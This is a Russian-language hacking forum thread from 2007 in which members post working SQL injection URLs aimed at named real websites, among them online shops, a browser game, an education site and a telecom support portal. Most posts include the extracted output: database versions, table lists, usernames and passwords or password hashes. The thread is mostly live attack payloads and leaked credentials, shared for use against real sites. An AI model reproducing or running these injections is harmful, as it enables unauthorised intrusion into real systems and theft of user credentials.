25.10.2007, 14:05
|
|
Новичок
Регистрация: 05.09.2006
Сообщений: 18
С нами:
10358301
Репутация:
42
|
|
Код:
http://www.1234567.ru/topic.html?topic=35/**/UNION/**/SELECT/**/1,null,concat(cl_email,char(58),cl_pass)/**/From/**/clients/**/where/**/cl_email/**/like/**/CHAR(37,64,37)/**/limit/**/223403,1/*
|
|
|
25.10.2007, 14:21
|
|
Участник форума
Регистрация: 16.06.2007
Сообщений: 133
С нами:
9949072
Репутация:
237
|
|
Код:
http://intercar.com.ua/index.php?id=-19+UNION+SELECT+1,2,version(),USER(),5,6/*
|
|
|
|
25.10.2007, 14:37
|
|
Участник форума
Регистрация: 12.01.2007
Сообщений: 262
С нами:
10172486
Репутация:
874
|
|
2 sunb0rn.
У меня как раз все получилось. Своим постом я отвечал K1nD[e]R. 
2 K1nD[e]R. Та все можно "откапать" даже пароли не зашифрованы. Хотя может и не все, там в разных таблицах пароли |
|
|
|
25.10.2007, 14:50
|
|
Участник форума
Регистрация: 16.06.2007
Сообщений: 133
С нами:
9949072
Репутация:
237
|
|
ага да я тока 1 раз попробывал...
|
|
|
|
25.10.2007, 15:01
|
|
Участник форума
Регистрация: 28.12.2006
Сообщений: 111
С нами:
10194175
Репутация:
524
|
|
Код:
http://www.planeta2.ru/print_news.php?id=-1+union+select+1,2,3,4,5,6,concat(version(),0x3a,database(),0x3a,user())/*
4.1.21-standard : planeta2_db : planeta2_base@localhost
Код:
http://www.hayinfo.ru/print.php?tb_id=2&sub_id=1&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,concat(version(),0x3a,database(),0x3a,user())/*
4.1.22:wwwhayinforu_hayinfo:hayinfo@localhost |
|
|
|
25.10.2007, 16:46
|
|
Познающий
Регистрация: 10.02.2007
Сообщений: 38
С нами:
10130311
Репутация:
183
|
|
bigmir.net
Mystery: legends of the beyond
это браузерная ролевая многопользовательская онлайн-игра,
основанная на принципах ККИ (коллекционных карточных игр).
.................................................. .......................
Код:
http://mystery.bigmir.net/game/frames/userdetails.php?id=-1+union+select+1,2,TABLE_NAME,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75+from+INFORMATION_SCHEMA.TABLES+limit+55,1/*
.................................................. .......................
Админ панель форума:
http://mystery.bigmir.net/forum/index.php
-------------------------------------------------------------------------------
Код:
http://mystery.bigmir.net/game/frames/userdetails.php?id=-1+union+select+1,version(),concat(username,0x203a20,user_password),4,5,6,7,8,user(),10,11,12,13,14,15,16,17,18,19,database(),21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,user_email,64,65,66,67,68,69,70,71,72,73,74,75+from+forum.phpbb_users+limit+1,1/*
admin:602a22d25967b8ed0c401e445e020587: forum1111
.................................................. .......................
USERS:
Mystery: legends of the beyond, users.
-------------------------------------------------------------------------------
Код:
http://mystery.bigmir.net/game/frames/userdetails.php?id=-1+union+select+1,version(),concat(name,0x203a20,password),4,5,6,7,8,user(),10,11,12,13,14,15,16,17,18,19,database(),21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75+from+mystery2.USERS+limit+0,1/*
admin:95KFVKtN
-------------------------------------------------------------------------------
БД:
Код:
information_schema
forum
mystery
mystery2
test
-------------------------------------------------------------------------------
Таблицы:
Код:
WORLDMAP
USER_TEMPSCRIPTS
USER_RIGHTS
USER_PROF
USER_PENALTY
USER_MAPCELL_PROPS
USER_MAPCELL_BAG
USER_MAP
USER_LOG
USER_LOCATIONS_VISIBILITY
USER_DECK_PRESETS
USER_DECK
USER_AWARDS
USER_ARTEFACTS
USERS
phpbb_users
--------------------------------------------------------------------------------
************************************************** ************
Последний раз редактировалось +StArT+; 09.04.2009 в 19:35..
|
|
|
|
25.10.2007, 17:24
|
|
Leaders of Antichat
Регистрация: 25.01.2007
Сообщений: 341
С нами:
10153766
Репутация:
2565
|
|
edu+mssql
www.aim.edu
Код:
http://www.aim.edu/faculty/facultyresume.asp?id=-1+or+1=@@version--
Version:
Код:
Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
Интересные таблы:
Код:
Microfinance.admin_login
Microfinance.Registration
aimadb.users
Users:
Код:
admin:aimadb
dbriones:adbaim
mperalta:mperalta
policy:aimpolicy
|
|
|
|
25.10.2007, 17:30
|
|
Участник форума
Регистрация: 25.05.2007
Сообщений: 147
С нами:
9981026
Репутация:
728
|
|
Интернет магазин "Магистра"
Код:
http://shop.magistra.ru/catalog/phone_ext.php?id_t=-284+union+select+1,2,0x3C7363726970743E616C657274282773716C27293C2F7363726970743E,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79/*
Версия: 4.1.22-log
Юзверь: magistr6_shop@localhost
Опять доисторический баг в phpBB форуме
depressia.com
Код:
http://depressia.com/forum/privmsg.php?folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20UNION%20SELECT%20user_icq,2,user_email,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,username,21,22,23,24,25,26,27,28,29,user_password%20FROM%20phpbb_users%20LIMIT%201,999/*
Версия: 4.1.22-standard-log
Юзверь: depressi_depress@localhost
Тестовый акк на форуме:
Login: sqlbug
Pass: 123
phpBB admin
login: Admin
hash: 6c4ed79eb38fc8aa064eaa5208ce0adf
Последний раз редактировалось 0nep@t0p; 25.10.2007 в 17:34..
|
|
|
|
25.10.2007, 19:35
|
|
Познающий
Регистрация: 24.12.2006
Сообщений: 90
С нами:
10200612
Репутация:
168
|
|
http://ck_DEL_pt.ru/service?id=169+uniOn+selEct+1,2,3,4,5,6,7,version( ),9,0,1--
помогите найти таблицу админки
|
|
|
|
04.11.2007, 23:22
|
|
Познающий
Регистрация: 24.12.2006
Сообщений: 90
С нами:
10200612
Репутация:
168
|
|
http://support.kharkiv.ukrtelecom.ua/
Код:
http://support.kharkiv.ukrtelecom.ua/news/?id=1+unIon+SelEcT+null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,current_database()||chr(58)||version()||chr(58)||current_user,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--
Общая информация:
support:PostgreSQL 7.3.18 on i686-pc-linux-gnu, compiled by GCC gcc (GCC) 3.2.2 20030222 (Red Hat Linux 3.2.2-5): reader
==========================================
Код:
http://support.kharkiv.ukrtelecom.ua/news/?id=1+unIon+SelEcT+null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,usename||chr(58)||passwd,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null+from+pg_user--
Выбераем пользователей с "паролями":
pgsql:********
postgres:********
reader:********
writer:********
===========================================
Код:
http://support.kharkiv.ukrtelecom.ua/news/?id=1+unIon+SelEcT+null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,usename,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null+from+pg_user+where+usesuper=true--
Выбераем привилегированных пользователей:
postgres
к сожелению вытащить пароль из pg_shadow не получится, мы работаем от пользователя ридер(
==========================================
Код:
http://support.kharkiv.ukrtelecom.ua/news/?id=1+unIon+SelEcT+null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,datname,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null+from+pg_database--
выбираем существующии базы:
balakleya
bogoduhiv
callcenter
chuguyiv
cit
dergachi
forum
Gallery
games
izum
kalendar
krasnograd
kupyansk
lozova
mtz
news
opros
orderdsl
Phone
pool
postgres
radio
rayon
sc
support
template0
template1
vodolaga
vovchansk
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для K1nD[e]R](/avatars/avatar37752.jpg?489479){kind=avatar}
![Аватар для K1nD[e]R](/avatars/avatar37752.jpg?489496){kind=avatar}
![Аватар для [53x]Shadow](/avatars/avatar32248.jpg?489623){kind=avatar}
Комбинированный вид
